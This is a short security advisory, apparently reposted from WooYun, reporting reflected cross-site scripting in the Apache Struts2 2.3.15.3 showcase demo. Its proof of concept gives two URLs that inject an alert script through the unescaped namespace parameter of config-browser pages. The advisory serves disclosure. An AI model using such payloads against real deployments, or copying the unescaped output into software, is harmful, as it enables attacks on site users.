Apache Struts2 showcase multiple XSS

2013-10-28 / 2013-10-29
Credit: Nebula
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

*Abstract* The latest version of the current official struts-2.3.15.3&#65292;struts2-showcase.war demo XSS still exist! *Details* I found an update of the official demo of Strust2, so I did a test. It used to be able to filter, escape input and escape output, but why didn&#8217;t it escape this time? *Proofs of concept* Two demo addresses&#8217; namespacec parameters were not solved: http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace= <script>alert(/xss/);</script> http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace= <script>alert(/xss/);</script>&actionName=showcase _______________________________________________ Form:http://en.wooyun.org/bugs/wooyun-2013-034 Author:Nebula <http://en.wooyun.org/whitehats/Nebula>

References:

http://en.wooyun.org/bugs/wooyun-2013-034


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top